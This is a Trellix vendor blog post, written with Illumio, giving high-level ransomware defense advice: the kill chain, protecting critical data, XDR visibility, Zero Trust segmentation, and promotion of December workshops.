Request a Demo Cybersecurity Assessment Latest Trellix Events Contact Us

Blogs

The latest cybersecurity trends, best practices, security vulnerabilities, and more

Trellix and Illumio Team Up with Advice on How to Defeat Ransomware

Ransomware has been the most prevalent form of cyberattack every year for the last decade. And it shows no sign of abating. Cyber criminals are coming up with new ways to monetize their attacks and employing more complex and sophisticated tactics.

Looking ahead to 2024, the Trellix Advanced Research Center predicts that more ransomware groups will contact the clients of their victims as a new way to apply pressure and increase their earnings.

What can you do to strengthen your security posture and protect your organization? Trellix is partnering with Illumio on a series of Ransomware Detection and Response Workshops this December in the United States. Here are some key pointers from the workshops with insights from Illumio Chief Evangelist John Kindervag, widely known as the creator of Zero Trust.

Understand the anatomy of a ransomware attack and the ransomware kill chain

Ransomware attacks are sophisticated multi-stage operations that take place over time. The Trellix Advanced Research Center analyzed more than 9,000 real-world attacks to develop a seven-stage kill chain model specific to ransomware.

During an early stage of the kill chain, such as Reconnaissance, an attacker may be scanning your environment, gathering information, and phishing for information. An XDR platform with a threat intelligence foundation helps organizations detect attacks at the earliest stages.

Ransomware grows more dangerous after initial access, as attackers move laterally through the network and hunt for valuable data to exfiltrate to a command and control server. Shutting down lateral movement and command and control is essential to reducing the impact of an attack. Yet many organizations are challenged to connect the dots across multiple siloed tools and prioritize threats amid alert “noise” during these phases – another reason XDR is so essential.

Says Kindervag, “The most important thing that organizations need to understand is that they’re allowing command and control from the ransomware attacker to come into their network and access the data or asset that is being hit with a ransomware attack.”

Prepare by assessing your gaps and locating your crown jewels

Preparation is critical to combating ransomware. According to Trellix CISO Harold Rivas, “Regular security control assessments are crucial tools for identifying weak spots in systems.”

Your preparation should include simulated attacks and vulnerability scans. Ransomware isn’t like other cyber incidents, so it’s important to drill for it. Taking part in tabletop exercises, engaging professional services for vulnerability assessments, and staying abreast of new threat actors and tactics can all help you prepare.

It’s especially important before an attack to understand the critical data assets you’re protecting.

Says Kindervag, “Understand what data or assets you have that are really important and critical to your business function (data that you would be forced to pay a ransom on if it was held hostage because your operations couldn’t continue without it). That is precisely the data that attackers will target. There are two types of data in the world: there’s data that people want to steal and everything else. You protect the data that people want to steal. And if you don’t understand what that is, then you’re a juicy target for attackers.”

Gain visibility with XDR

Visibility is key to effective ransomware defense. The earlier in the ransomware kill chain that you can detect and respond to an attack, the better off you will be. By integrating multiple data sources and providing intelligent correlation across security controls and threat intelligence, XDR helps you detect and respond to an attack much earlier in the ransomware lifecycle.

“XDR provides telemetry for visibility that can be vital to early detection and mitigation of ransomware attacks,” says Kindervag.

The Trellix XDR Platform minimizes time to detection and resolution from days and weeks to hours and minutes.

Evolve your maturity

Ransomware detection and response maturity is a journey. Many organizations at early stages of their maturity have endpoint protection. Endpoint protection is foundational, but it’s not enough. Ransomware threat actors are increasingly using non-malicious tools to escape detection – what is commonly known as LoLBins (“living off the land” binaries and scripts) that are challenging for traditional endpoint protection to detect.

As you evolve from foundational ransomware resilience, layer additional security controls and link them through integrations. In the Trellix Ransomware Detection and Response Workshops we cover increasing stages of ransomware resilience. Mature organizations may integrate EDR, XDR, NDR, and other sophisticated technologies.

Explains Kindervag, “Much of cybersecurity is about creating friction so that the attacker will move off to a softer target. It’s often said that “attackers don’t attack well-defended networks,” and since attackers have a Return on Investment (ROI) that they must meet, they’re not going to spend much time in a Zero Trust environment that’s properly segmented. That’s because they recognize it’s fairly futile to get to the assets they want to steal or disrupt in order to monetize their business model. In short, microsegmentation makes it harder for bad actors to realize a tangible ROI on their attacks.”

Implement a Zero Trust Strategy

Zero Trust principles of “Never trust, always verify” arose from Kindervag’s time as VP and Principal Analyst at Forrester Research. At Illumio, a Zero Trust Segmentation approach makes it difficult for cyber criminals to carry out their attacks.

Kindervag explains, “In Zero Trust, our primary control is a segmentation gateway that segments the data or asset into its own Protect Surface (essentially, the smallest possible reduction of the attack surface to the data, applications, assets, and services that you need to protect). So, having visibility is number 1. You’re trying to get visibility so that you can see the ransomware attack starting to happen and stop it from being successful. Having proper telemetry becomes really important as well. And then a way to operationalize that quickly, like with Zero Trust Segmentation, so you can shut down the attack before it can do significant damage to the business.”

You can learn more about how Trellix and Illumio help you defend against ransomware at an upcoming Ransomware Detection and Response Workshop in Tampa on Dec. 5, Atlanta on Dec. 7, or Houston on Dec. 12.

Get the latest

We’re no strangers to cybersecurity. But we are a new company.
Stay up to date as we evolve.

Please enter a valid email address.

Zero spam. Unsubscribe at any time.